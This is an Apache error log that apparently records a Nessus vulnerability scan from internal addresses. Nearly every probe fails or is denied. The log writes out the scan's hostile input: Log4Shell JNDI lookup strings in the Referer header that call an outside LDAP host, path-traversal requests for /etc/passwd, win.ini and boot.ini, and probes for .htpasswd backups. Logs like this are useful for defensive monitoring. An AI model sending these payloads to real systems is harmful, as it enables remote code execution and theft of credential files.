[Wed Oct 29 00:41:55.904657 2025] [cgi:error] [pid 63275] [client 10.10.36.247:32628] script not found or unable to stat: /var/www/cgi-bin/administrator, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:42:01.166026 2025] [cgi:error] [pid 70880] [client 10.10.36.247:32640] script not found or unable to stat: /var/www/cgi-bin/administrator.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:42:06.429465 2025] [cgi:error] [pid 63279] [client 10.10.36.247:32670] script not found or unable to stat: /var/www/cgi-bin/agorn.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:42:11.687497 2025] [cgi:error] [pid 15422] [client 10.10.36.247:32686] script not found or unable to stat: /var/www/cgi-bin/bugreport.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:42:11.771203 2025] [:error] [pid 63275] [client 10.10.36.245:36834] script '/var/www/html/header.php' not found or unable to stat
[Wed Oct 29 00:42:12.544659 2025] [:error] [pid 70885] [client 10.10.36.245:36870] script '/var/www/html/login.php' not found or unable to stat
[Wed Oct 29 00:42:16.943050 2025] [cgi:error] [pid 40745] [client 10.10.36.247:32728] script not found or unable to stat: /var/www/cgi-bin/cart.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:42:17.233556 2025] [:error] [pid 60320] [client 10.10.36.245:37174] script '/var/www/html/header.php' not found or unable to stat
[Wed Oct 29 00:42:19.953671 2025] [core:error] [pid 60320] [client 10.10.36.245:37340] AH00135: Invalid method in request BXMVXD / HTTP/1.1
[Wed Oct 29 00:42:22.211831 2025] [cgi:error] [pid 63275] [client 10.10.36.247:32740] script not found or unable to stat: /var/www/cgi-bin/clwarn.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:42:22.313094 2025] [:error] [pid 70880] [client 10.10.36.245:37466] script '/var/www/html/mX8zzFNWFvwp.php' not found or unable to stat
[Wed Oct 29 00:42:22.991734 2025] [cgi:error] [pid 76323] [client 10.10.36.245:37508] script not found or unable to stat: /var/www/cgi-bin/mX8zzFNWFvwp.html
[Wed Oct 29 00:42:23.213370 2025] [cgi:error] [pid 40745] [client 10.10.36.245:37520] script not found or unable to stat: /var/www/cgi-bin/mX8zzFNWFvwp.cgi
[Wed Oct 29 00:42:23.437218 2025] [cgi:error] [pid 60169] [client 10.10.36.245:37532] script not found or unable to stat: /var/www/cgi-bin/mX8zzFNWFvwp.sh
[Wed Oct 29 00:42:23.659062 2025] [cgi:error] [pid 60320] [client 10.10.36.245:37544] script not found or unable to stat: /var/www/cgi-bin/mX8zzFNWFvwp.pl
[Wed Oct 29 00:42:23.881200 2025] [cgi:error] [pid 22132] [client 10.10.36.245:37554] script not found or unable to stat: /var/www/cgi-bin/mX8zzFNWFvwp.inc
[Wed Oct 29 00:42:24.105782 2025] [cgi:error] [pid 15422] [client 10.10.36.245:37566] script not found or unable to stat: /var/www/cgi-bin/mX8zzFNWFvwp.shtml
[Wed Oct 29 00:42:24.329678 2025] [cgi:error] [pid 70880] [client 10.10.36.245:37578] script not found or unable to stat: /var/www/cgi-bin/mX8zzFNWFvwp.asp
[Wed Oct 29 00:42:24.552662 2025] [:error] [pid 70885] [client 10.10.36.245:37590] script '/var/www/cgi-bin/mX8zzFNWFvwp.php' not found or unable to stat
[Wed Oct 29 00:42:24.772618 2025] [cgi:error] [pid 76323] [client 10.10.36.245:37602] script not found or unable to stat: /var/www/cgi-bin/mX8zzFNWFvwp.php3
[Wed Oct 29 00:42:24.993602 2025] [cgi:error] [pid 40745] [client 10.10.36.245:37616] script not found or unable to stat: /var/www/cgi-bin/mX8zzFNWFvwp.cfm
[Wed Oct 29 00:42:27.469860 2025] [cgi:error] [pid 60169] [client 10.10.36.247:32764] script not found or unable to stat: /var/www/cgi-bin/count.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:42:30.346307 2025] [core:error] [pid 40745] [client 10.10.36.245:37904] AH00126: Invalid URI in request GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
[Wed Oct 29 00:42:30.571541 2025] [core:error] [pid 22132] [client 10.10.36.245:37918] AH00126: Invalid URI in request GET /../../../../../../../../../../../../winnt/win.ini HTTP/1.1
[Wed Oct 29 00:42:30.793134 2025] [core:error] [pid 63275] [client 10.10.36.245:37930] AH00126: Invalid URI in request GET ../../../../../../../../../../../../windows/win.ini HTTP/1.1
[Wed Oct 29 00:42:30.922336 2025] [:error] [pid 63279] [client 10.10.36.245:37938] script '/var/www/html/main_internet.php' not found or unable to stat
[Wed Oct 29 00:42:31.025636 2025] [core:error] [pid 70885] [client 10.10.36.245:37944] AH00126: Invalid URI in request GET ../../../../../../../../../../../../winnt/win.ini HTTP/1.1
[Wed Oct 29 00:42:31.252337 2025] [core:error] [pid 60169] [client 10.10.36.245:37960] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Wed Oct 29 00:42:31.483128 2025] [core:error] [pid 15422] [client 10.10.36.245:37972] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
[Wed Oct 29 00:42:32.733991 2025] [cgi:error] [pid 22132] [client 10.10.36.247:32774] script not found or unable to stat: /var/www/cgi-bin/Count.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:42:33.946858 2025] [core:error] [pid 63275] [client 10.10.36.245:38136] AH00126: Invalid URI in request GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
[Wed Oct 29 00:42:34.168232 2025] [core:error] [pid 76323] [client 10.10.36.245:38152] AH00126: Invalid URI in request GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini HTTP/1.1
[Wed Oct 29 00:42:34.713462 2025] [:error] [pid 76323] [client 10.10.36.245:38192] script '/var/www/html/index.php' not found or unable to stat
[Wed Oct 29 00:42:34.729027 2025] [core:error] [pid 40745] [client 10.10.36.245:38194] AH00126: Invalid URI in request GET c:\\boot.ini HTTP/1.1
[Wed Oct 29 00:42:35.060166 2025] [core:error] [pid 63279] [client 10.10.36.245:38224] AH00126: Invalid URI in request GET %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.1
[Wed Oct 29 00:42:37.450231 2025] [core:error] [pid 60169] [client 10.10.36.245:38338] AH00126: Invalid URI in request GET /././././././../../../../../windows/win.ini HTTP/1.1
[Wed Oct 29 00:42:37.581994 2025] [core:error] [pid 60320] [client 10.10.36.245:38346] AH00126: Invalid URI in request GET /././././././../../../../../winnt/win.ini HTTP/1.1
[Wed Oct 29 00:42:37.864947 2025] [core:error] [pid 70880] [client 10.10.36.245:38358] AH00126: Invalid URI in request GET .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/windows/win.ini HTTP/1.1
[Wed Oct 29 00:42:37.989993 2025] [cgi:error] [pid 60320] [client 10.10.36.247:32798] script not found or unable to stat: /var/www/cgi-bin/faqmanager.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:42:38.089878 2025] [core:error] [pid 22132] [client 10.10.36.245:38384] AH00126: Invalid URI in request GET .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/winnt/win.ini HTTP/1.1
[Wed Oct 29 00:42:41.048471 2025] [core:error] [pid 76323] [client 10.10.36.245:38552] AH00126: Invalid URI in request GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
[Wed Oct 29 00:42:41.052043 2025] [core:error] [pid 40745] [client 10.10.36.245:38554] AH00126: Invalid URI in request GET /./../../../../../../../../../../../etc/passwd HTTP/1.1
[Wed Oct 29 00:42:41.054386 2025] [core:error] [pid 60169] [client 10.10.36.245:38556] AH00126: Invalid URI in request GET //../../../../../../../../../../../../etc/passwd HTTP/1.1
[Wed Oct 29 00:42:41.283403 2025] [core:error] [pid 70880] [client 10.10.36.245:38572] AH00126: Invalid URI in request GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Wed Oct 29 00:42:41.418594 2025] [cgi:error] [pid 76323] [client 10.10.36.245:38578] script not found or unable to stat: /var/www/cgi-bin/client_execute.cgi
[Wed Oct 29 00:42:41.984875 2025] [core:error] [pid 22132] [client 10.10.36.245:38614] AH00126: Invalid URI in request GET /././././././../../../../../etc/passwd HTTP/1.1
[Wed Oct 29 00:42:42.412290 2025] [cgi:error] [pid 22132] [client 10.10.36.245:38642] script not found or unable to stat: /var/www/cgi-bin/authLogin.cgi
[Wed Oct 29 00:42:42.435410 2025] [cgi:error] [pid 15422] [client 10.10.36.245:38644] script not found or unable to stat: /var/www/cgi-bin/authLogin.cgi
[Wed Oct 29 00:42:42.550700 2025] [cgi:error] [pid 63275] [client 10.10.36.245:38648] script not found or unable to stat: /var/www/cgi-bin/guestimage.html
[Wed Oct 29 00:42:42.683167 2025] [core:error] [pid 63279] [client 10.10.36.245:38654] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Wed Oct 29 00:42:42.685185 2025] [core:error] [pid 70885] [client 10.10.36.245:38656] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
[Wed Oct 29 00:42:43.261853 2025] [cgi:error] [pid 22132] [client 10.10.36.247:32804] script not found or unable to stat: /var/www/cgi-bin/FormHandler.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:42:43.354219 2025] [cgi:error] [pid 15422] [client 10.10.36.245:38698] script not found or unable to stat: /var/www/cgi-bin/printenv
[Wed Oct 29 00:42:43.439698 2025] [:error] [pid 70880] [client 10.10.36.245:38704] script '/var/www/html/index.php' not found or unable to stat
[Wed Oct 29 00:42:43.451526 2025] [cgi:error] [pid 63279] [client 10.10.36.245:38706] script not found or unable to stat: /var/www/cgi-bin/camctrl.cgi
[Wed Oct 29 00:42:43.680219 2025] [cgi:error] [pid 76323] [client 10.10.36.245:38760] script not found or unable to stat: /var/www/cgi-bin/ctrldirect.cgi
[Wed Oct 29 00:42:43.795286 2025] [cgi:error] [pid 40745] [client 10.10.36.245:38790] script not found or unable to stat: /var/www/cgi-bin/pdesk.cgi
[Wed Oct 29 00:42:46.366979 2025] [cgi:error] [pid 63275] [client 10.10.36.245:38956] script not found or unable to stat: /var/www/cgi-bin/luci
[Wed Oct 29 00:42:46.850644 2025] [cgi:error] [pid 22132] [client 10.10.36.245:38986] script not found or unable to stat: /var/www/cgi-bin/pub
[Wed Oct 29 00:42:46.893759 2025] [cgi:error] [pid 70880] [client 10.10.36.245:38994] script not found or unable to stat: /var/www/cgi-bin/mrlg.cgi
[Wed Oct 29 00:42:48.539968 2025] [cgi:error] [pid 63275] [client 10.10.36.247:32828] script not found or unable to stat: /var/www/cgi-bin/FormMail.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:42:49.897104 2025] [:error] [pid 15422] [client 10.10.36.245:39228] script '/var/www/html/login.php' not found or unable to stat
[Wed Oct 29 00:42:53.805733 2025] [cgi:error] [pid 63275] [client 10.10.36.247:32840] script not found or unable to stat: /var/www/cgi-bin/guestbook.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:42:55.520596 2025] [core:error] [pid 76323] [client 10.10.36.245:39612] AH00135: Invalid method in request NESSUS / HTTP/1.0
[Wed Oct 29 00:42:56.312018 2025] [:error] [pid 40745] [client 10.10.36.245:39682] script '/var/www/html/niet292242396.php' not found or unable to stat
[Wed Oct 29 00:42:56.602088 2025] [cgi:error] [pid 76323] [client 10.10.36.245:39710] script not found or unable to stat: /var/www/cgi-bin/com5.pl
[Wed Oct 29 00:42:58.700722 2025] [core:error] [pid 63279] [client 10.10.36.245:39828] AH00126: Invalid URI in request GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Wed Oct 29 00:42:59.071164 2025] [cgi:error] [pid 60320] [client 10.10.36.247:32860] script not found or unable to stat: /var/www/cgi-bin/help.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:03.534192 2025] [:error] [pid 76323] [client 10.10.36.245:40104] script '/var/www/html/default.php' not found or unable to stat
[Wed Oct 29 00:43:04.333716 2025] [cgi:error] [pid 63279] [client 10.10.36.247:32870] script not found or unable to stat: /var/www/cgi-bin/hi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:06.010186 2025] [:error] [pid 60320] [client 10.10.36.245:40228] script '/var/www/html/update.php' not found or unable to stat
[Wed Oct 29 00:43:06.075961 2025] [cgi:error] [pid 22132] [client 10.10.36.245:40232] script not found or unable to stat: /var/www/cgi-bin/mainfunction.cgi
[Wed Oct 29 00:43:09.591391 2025] [cgi:error] [pid 63279] [client 10.10.36.247:32894] script not found or unable to stat: /var/www/cgi-bin/index.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:11.635919 2025] [:error] [pid 60320] [client 10.10.36.245:40586] script '/var/www/html/977mupmi.php' not found or unable to stat
[Wed Oct 29 00:43:11.638278 2025] [:error] [pid 22132] [client 10.10.36.245:40588] script '/var/www/html/977mupmi.php' not found or unable to stat
[Wed Oct 29 00:43:11.704408 2025] [core:error] [pid 40745] [client 10.10.36.245:40646] AH00126: Invalid URI in request GET HTTP/1.1
[Wed Oct 29 00:43:11.710490 2025] [core:error] [pid 22132] [client 10.10.36.245:40652] AH00126: Invalid URI in request GET HTTP/1.1
[Wed Oct 29 00:43:14.853680 2025] [cgi:error] [pid 22132] [client 10.10.36.247:32900] script not found or unable to stat: /var/www/cgi-bin/index.pl, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:20.111694 2025] [cgi:error] [pid 60320] [client 10.10.36.247:32924] script not found or unable to stat: /var/www/cgi-bin/index.sh, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:20.643550 2025] [:error] [pid 70885] [client 10.10.36.245:41164] script '/var/www/html/forum.php' not found or unable to stat
[Wed Oct 29 00:43:21.788348 2025] [:error] [pid 15422] [client 10.10.36.245:41246] script '/var/www/html/header.php' not found or unable to stat
[Wed Oct 29 00:43:22.020820 2025] [cgi:error] [pid 63279] [client 10.10.36.245:41268] script not found or unable to stat: /var/www/cgi-bin/index.cgi
[Wed Oct 29 00:43:22.068376 2025] [authz_core:error] [pid 70885] [client 10.10.36.245:41270] AH01630: client denied by server configuration: /var/www/html/.htaccess.old
[Wed Oct 29 00:43:22.081456 2025] [authz_core:error] [pid 76323] [client 10.10.36.245:41272] AH01630: client denied by server configuration: /var/www/html/.htaccess.bak
[Wed Oct 29 00:43:22.083597 2025] [authz_core:error] [pid 40745] [client 10.10.36.245:41276] AH01630: client denied by server configuration: /var/www/html/.htaccess~
[Wed Oct 29 00:43:22.085626 2025] [authz_core:error] [pid 60169] [client 10.10.36.245:41278] AH01630: client denied by server configuration: /var/www/html/.htaccess.copy
[Wed Oct 29 00:43:22.087884 2025] [authz_core:error] [pid 60320] [client 10.10.36.245:41280] AH01630: client denied by server configuration: /var/www/html/.htaccess.tmp
[Wed Oct 29 00:43:22.317436 2025] [authz_core:error] [pid 63279] [client 10.10.36.245:41312] AH01630: client denied by server configuration: /var/www/html/.htaccess.1
[Wed Oct 29 00:43:22.319765 2025] [authz_core:error] [pid 70885] [client 10.10.36.245:41314] AH01630: client denied by server configuration: /var/www/html/.htaccess.~1~
[Wed Oct 29 00:43:22.481619 2025] [cgi:error] [pid 40745] [client 10.10.36.245:41328] script not found or unable to stat: /var/www/cgi-bin/kvm.cgi
[Wed Oct 29 00:43:24.402983 2025] [cgi:error] [pid 22132] [client 10.10.36.245:41460] script not found or unable to stat: /var/www/cgi-bin/admin, referer: ${jndi:ldap://log4shell-generic-m8V0vZ9nFuNAH924RwAN${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:25.386562 2025] [cgi:error] [pid 22132] [client 10.10.36.247:32944] script not found or unable to stat: /var/www/cgi-bin/login.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:29.660358 2025] [cgi:error] [pid 70880] [client 10.10.36.245:41802] script not found or unable to stat: /var/www/cgi-bin/admin.cgi, referer: ${jndi:ldap://log4shell-generic-m8V0vZ9nFuNAH924RwAN${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:30.647841 2025] [cgi:error] [pid 60169] [client 10.10.36.247:32966] script not found or unable to stat: /var/www/cgi-bin/mailit.pl, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:34.929799 2025] [cgi:error] [pid 60320] [client 10.10.36.245:42284] script not found or unable to stat: /var/www/cgi-bin/admin.pl, referer: ${jndi:ldap://log4shell-generic-m8V0vZ9nFuNAH924RwAN${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:35.914409 2025] [cgi:error] [pid 63279] [client 10.10.36.247:32976] script not found or unable to stat: /var/www/cgi-bin/mt, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:40.185576 2025] [cgi:error] [pid 63279] [client 10.10.36.245:42564] script not found or unable to stat: /var/www/cgi-bin/administrator, referer: ${jndi:ldap://log4shell-generic-m8V0vZ9nFuNAH924RwAN${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:41.185445 2025] [cgi:error] [pid 22132] [client 10.10.36.247:33004] script not found or unable to stat: /var/www/cgi-bin/mt, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:45.445963 2025] [cgi:error] [pid 22132] [client 10.10.36.245:42940] script not found or unable to stat: /var/www/cgi-bin/administrator.cgi, referer: ${jndi:ldap://log4shell-generic-m8V0vZ9nFuNAH924RwAN${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:46.447334 2025] [cgi:error] [pid 76323] [client 10.10.36.247:33014] script not found or unable to stat: /var/www/cgi-bin/mt-static, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:50.716043 2025] [cgi:error] [pid 70885] [client 10.10.36.245:43206] script not found or unable to stat: /var/www/cgi-bin/agorn.cgi, referer: ${jndi:ldap://log4shell-generic-m8V0vZ9nFuNAH924RwAN${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:51.719817 2025] [cgi:error] [pid 76323] [client 10.10.36.247:33034] script not found or unable to stat: /var/www/cgi-bin/mt-static, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:55.979192 2025] [cgi:error] [pid 40745] [client 10.10.36.245:43472] script not found or unable to stat: /var/www/cgi-bin/bugreport.cgi, referer: ${jndi:ldap://log4shell-generic-m8V0vZ9nFuNAH924RwAN${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:43:56.982649 2025] [cgi:error] [pid 60169] [client 10.10.36.247:33050] script not found or unable to stat: /var/www/cgi-bin/ncbook, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:44:01.244753 2025] [cgi:error] [pid 60320] [client 10.10.36.245:43872] script not found or unable to stat: /var/www/cgi-bin/cart.cgi, referer: ${jndi:ldap://log4shell-generic-m8V0vZ9nFuNAH924RwAN${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:44:02.238810 2025] [cgi:error] [pid 22132] [client 10.10.36.247:33060] script not found or unable to stat: /var/www/cgi-bin/printenv, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:44:06.506170 2025] [cgi:error] [pid 63275] [client 10.10.36.245:44016] script not found or unable to stat: /var/www/cgi-bin/clwarn.cgi, referer: ${jndi:ldap://log4shell-generic-m8V0vZ9nFuNAH924RwAN${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:44:07.502371 2025] [cgi:error] [pid 70880] [client 10.10.36.247:33084] script not found or unable to stat: /var/www/cgi-bin/printenv.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:44:11.586618 2025] [authz_core:error] [pid 60320] [client 10.10.36.245:44094] AH01630: client denied by server configuration: /var/www/html/.htaccess
[Wed Oct 29 00:44:11.589228 2025] [authz_core:error] [pid 22132] [client 10.10.36.245:44096] AH01630: client denied by server configuration: /var/www/html/.htpasswd
